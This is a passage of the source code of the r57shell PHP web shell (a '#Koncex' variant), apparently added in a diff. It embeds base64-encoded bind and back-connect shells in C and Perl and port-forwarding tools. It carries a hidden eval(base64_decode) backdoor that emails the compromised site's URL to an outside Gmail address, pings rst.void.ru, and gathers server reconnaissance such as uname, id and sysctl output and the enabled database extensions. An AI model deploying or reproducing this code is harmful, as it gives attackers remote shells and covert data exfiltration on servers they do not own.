+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$a = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gM +DsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkYm9keSA9ICJhZGEgeWFuZyBpbmpl +Y3QgXG4kd2ViJGluaiI7bWFpbCgibmdlLnIwMHRAZ21haWwuY29tIiwic2V0b3JhbiBwYWsgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7fSBlbHN +lICR2aXNpdGNvdW50IDsgc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs=";echo eval(base64_decode($a)); +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } + if($safe_mode) { $sysctl = '-'; } + else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } + else + { + $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); + if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } + if(empty($sysctl)) { $sysctl = '-'; } + setcookie('sysctl',$sysctl); + } + } +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#E2ED2A><tr><td bgcolor=#000000 width=160><font face=Verdana size=2>'.ws(2).'<font face=Wingdings size=6><b>~</b></font><b><font face=THOMA size=7><b>^no-body^</b></font><b><font face=Wingdings size=6><b>~</b></font><b>'.ws(2).' [#Koncex '.$version.']</b></font></td><td bgcolor=#000000><font face=Verdana size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +if($unix) + { + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; + } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2)."safe_mode: <b>"; +echo (($safe_mode)?("<font color=red>SAFEMODE-IS-ON</font>"):("<font color=yellow>SAFEMODE-IS-OFF</font>")); +echo "</b>".ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=yellow>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=red>ON</font>"; } else { echo "<font color=yellow>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=yellow>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=yellow>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=yellow>OFF</font>";} +echo "</b><br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=yellow>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if($unix){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=yellow><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo 